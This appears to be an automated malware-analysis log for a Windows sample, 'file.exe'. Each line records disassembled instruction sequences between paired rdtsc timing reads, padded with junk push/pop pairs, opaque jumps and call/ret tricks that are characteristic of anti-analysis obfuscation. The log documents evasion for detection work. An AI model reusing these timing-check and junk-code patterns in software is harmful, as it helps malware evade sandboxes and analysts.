Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78A1E5 second address: 78A1F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8A9C76F21Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78A1F5 second address: 78A1FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78A1FB second address: 78A216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a push esi 0x0000000b pop esi 0x0000000c pop esi 0x0000000d jnp 00007F8A9C76F21Eh 0x00000013 jl 00007F8A9C76F216h 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78982F second address: 78984C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 jmp 00007F8A9D254EB5h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7899C8 second address: 7899CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7899CC second address: 7899D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78A03B second address: 78A05E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8A9C76F221h 0x00000009 jmp 00007F8A9C76F21Eh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78BB56 second address: 78BB73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9D254EB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78BB73 second address: 78BB7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F8A9C76F216h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78BC74 second address: 78BC8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9D254EB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78BC8B second address: 78BC91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78BD85 second address: 78BD8F instructions: 0x00000000 rdtsc 0x00000002 je 00007F8A9D254EA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78BE33 second address: 78BE37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78BE37 second address: 78BE3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78BE3D second address: 78BE41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78C47F second address: 78C483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78C483 second address: 78C4A2 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8A9C76F216h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop edx 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F8A9C76F21Bh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78C4A2 second address: 78C4A8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78C4A8 second address: 78C4AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78C4AE second address: 78C4B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78C5AD second address: 78C5B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78CA4E second address: 78CA58 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8A9D254EA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78DA07 second address: 78DA0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78DA0C second address: 78DA11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78EA29 second address: 78EAA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 call 00007F8A9C76F226h 0x0000000d mov dword ptr [ebp+122D2BB6h], ecx 0x00000013 pop edi 0x00000014 jbe 00007F8A9C76F216h 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push ebx 0x0000001f call 00007F8A9C76F218h 0x00000024 pop ebx 0x00000025 mov dword ptr [esp+04h], ebx 0x00000029 add dword ptr [esp+04h], 0000001Dh 0x00000031 inc ebx 0x00000032 push ebx 0x00000033 ret 0x00000034 pop ebx 0x00000035 ret 0x00000036 mov dword ptr [ebp+122D1B32h], edi 0x0000003c push 00000000h 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 jmp 00007F8A9C76F227h 0x00000047 pushad 0x00000048 popad 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 791EF5 second address: 791EFB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 791EFB second address: 791F09 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 791F09 second address: 791F5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9D254EAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a nop 0x0000000b push 00000000h 0x0000000d jmp 00007F8A9D254EACh 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007F8A9D254EA8h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 00000017h 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e xchg eax, ebx 0x0000002f jnp 00007F8A9D254EBEh 0x00000035 push eax 0x00000036 push edx 0x00000037 jp 00007F8A9D254EA6h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7954F2 second address: 7954F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7954F6 second address: 7954FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 798259 second address: 798281 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F8A9C76F227h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f jg 00007F8A9C76F216h 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 798281 second address: 7982B9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F8A9D254EB7h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c pushad 0x0000000d mov dword ptr [ebp+124783DAh], eax 0x00000013 mov dh, 14h 0x00000015 popad 0x00000016 push 00000000h 0x00000018 add ebx, 6B0EEC21h 0x0000001e push 00000000h 0x00000020 push eax 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7982B9 second address: 7982C3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7982C3 second address: 7982C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79B250 second address: 79B266 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8A9C76F222h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79B266 second address: 79B291 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov ebx, 7DBF161Bh 0x00000010 push 00000000h 0x00000012 or edi, 11B6DDE6h 0x00000018 push 00000000h 0x0000001a ja 00007F8A9D254EACh 0x00000020 push eax 0x00000021 push esi 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79D1B6 second address: 79D1BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79946A second address: 799477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F8A9D254EA6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79D1BA second address: 79D1BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79C3FA second address: 79C421 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9D254EB4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a js 00007F8A9D254EB2h 0x00000010 jng 00007F8A9D254EACh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79D1BE second address: 79D1C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79D1C8 second address: 79D219 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9D254EADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F8A9D254EAEh 0x00000010 nop 0x00000011 mov di, si 0x00000014 jns 00007F8A9D254EAEh 0x0000001a push 00000000h 0x0000001c mov ebx, edx 0x0000001e push 00000000h 0x00000020 mov bx, di 0x00000023 xchg eax, esi 0x00000024 pushad 0x00000025 jbe 00007F8A9D254EA8h 0x0000002b push edi 0x0000002c pop edi 0x0000002d push ecx 0x0000002e pushad 0x0000002f popad 0x00000030 pop ecx 0x00000031 popad 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 799586 second address: 79958A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79D219 second address: 79D224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F8A9D254EA6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79D224 second address: 79D22A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79D439 second address: 79D43D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79D43D second address: 79D443 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A0201 second address: 7A029C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9D254EB4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jmp 00007F8A9D254EB2h 0x00000011 push 00000000h 0x00000013 sub dword ptr [ebp+122D2C58h], esi 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push edi 0x0000001e call 00007F8A9D254EA8h 0x00000023 pop edi 0x00000024 mov dword ptr [esp+04h], edi 0x00000028 add dword ptr [esp+04h], 00000018h 0x00000030 inc edi 0x00000031 push edi 0x00000032 ret 0x00000033 pop edi 0x00000034 ret 0x00000035 jne 00007F8A9D254EB7h 0x0000003b xchg eax, esi 0x0000003c jnl 00007F8A9D254EB0h 0x00000042 push eax 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F8A9D254EB8h 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A122A second address: 7A1248 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8A9C76F220h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A1248 second address: 7A124C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A124C second address: 7A1252 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79F3A3 second address: 79F433 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F8A9D254EB4h 0x0000000c nop 0x0000000d pushad 0x0000000e and edx, dword ptr [ebp+122D36B6h] 0x00000014 mov dword ptr [ebp+122DB472h], edi 0x0000001a popad 0x0000001b adc ebx, 743149C6h 0x00000021 push dword ptr fs:[00000000h] 0x00000028 add edi, 557AAC7Eh 0x0000002e movsx ebx, dx 0x00000031 mov dword ptr fs:[00000000h], esp 0x00000038 mov edi, 62796BB2h 0x0000003d mov eax, dword ptr [ebp+122D0929h] 0x00000043 mov dword ptr [ebp+122D193Eh], edx 0x00000049 push FFFFFFFFh 0x0000004b push 00000000h 0x0000004d push ebx 0x0000004e call 00007F8A9D254EA8h 0x00000053 pop ebx 0x00000054 mov dword ptr [esp+04h], ebx 0x00000058 add dword ptr [esp+04h], 0000001Dh 0x00000060 inc ebx 0x00000061 push ebx 0x00000062 ret 0x00000063 pop ebx 0x00000064 ret 0x00000065 or dword ptr [ebp+122D280Eh], esi 0x0000006b nop 0x0000006c push eax 0x0000006d push edx 0x0000006e push eax 0x0000006f push edx 0x00000070 jo 00007F8A9D254EA6h 0x00000076 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79F433 second address: 79F44C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9C76F225h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79F44C second address: 79F452 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A201F second address: 7A2023 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A5DB7 second address: 7A5DD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9D254EAFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8A9D254EABh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A5DD9 second address: 7A5DDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A5DDF second address: 7A5E63 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov ebx, dword ptr [ebp+122D25DEh] 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F8A9D254EA8h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b add dword ptr [ebp+122D233Ah], ecx 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push edx 0x00000036 call 00007F8A9D254EA8h 0x0000003b pop edx 0x0000003c mov dword ptr [esp+04h], edx 0x00000040 add dword ptr [esp+04h], 0000001Dh 0x00000048 inc edx 0x00000049 push edx 0x0000004a ret 0x0000004b pop edx 0x0000004c ret 0x0000004d mov di, 5D53h 0x00000051 mov edi, dword ptr [ebp+122D1CDFh] 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007F8A9D254EB5h 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A0430 second address: 7A045B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8A9C76F222h 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F8A9C76F21Dh 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A3F29 second address: 7A3F2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A4FEF second address: 7A4FF5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A4FF5 second address: 7A4FFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A4FFA second address: 7A5093 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8A9C76F21Ch 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f jmp 00007F8A9C76F229h 0x00000014 pushad 0x00000015 adc al, 00000000h 0x00000018 call 00007F8A9C76F226h 0x0000001d push edi 0x0000001e pop edi 0x0000001f pop eax 0x00000020 popad 0x00000021 push dword ptr fs:[00000000h] 0x00000028 jl 00007F8A9C76F21Ch 0x0000002e mov bx, 2DC1h 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 mov dword ptr [ebp+1244BBEEh], eax 0x0000003f mov eax, dword ptr [ebp+122D120Dh] 0x00000045 and edi, 3D477143h 0x0000004b push FFFFFFFFh 0x0000004d mov bh, 94h 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007F8A9C76F225h 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A6F23 second address: 7A6F2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A6F2A second address: 7A6F2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AFA16 second address: 7AFA1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AFA1C second address: 7AFA39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8A9C76F221h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AFA39 second address: 7AFA3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AF173 second address: 7AF187 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8A9C76F21Eh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AF187 second address: 7AF18B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AF18B second address: 7AF19D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c jnp 00007F8A9C76F216h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AF19D second address: 7AF1BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9D254EB9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AF1BA second address: 7AF200 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnc 00007F8A9C76F22Dh 0x0000000f jmp 00007F8A9C76F227h 0x00000014 ja 00007F8A9C76F21Eh 0x0000001a jo 00007F8A9C76F216h 0x00000020 pushad 0x00000021 popad 0x00000022 pushad 0x00000023 jmp 00007F8A9C76F21Fh 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AF200 second address: 7AF206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AF206 second address: 7AF20C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AF378 second address: 7AF37C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AF37C second address: 7AF386 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8A9C76F21Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AF627 second address: 7AF640 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9D254EB5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B4C11 second address: 7B4C36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9C76F222h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007F8A9C76F218h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B4C36 second address: 7B4C75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F8A9D254EA6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [eax] 0x00000010 jmp 00007F8A9D254EB3h 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F8A9D254EB6h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B4C75 second address: 7B4C7F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8A9C76F21Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B4E6E second address: 7B4E72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B4E72 second address: 7B4E76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B4E76 second address: 7B4E80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
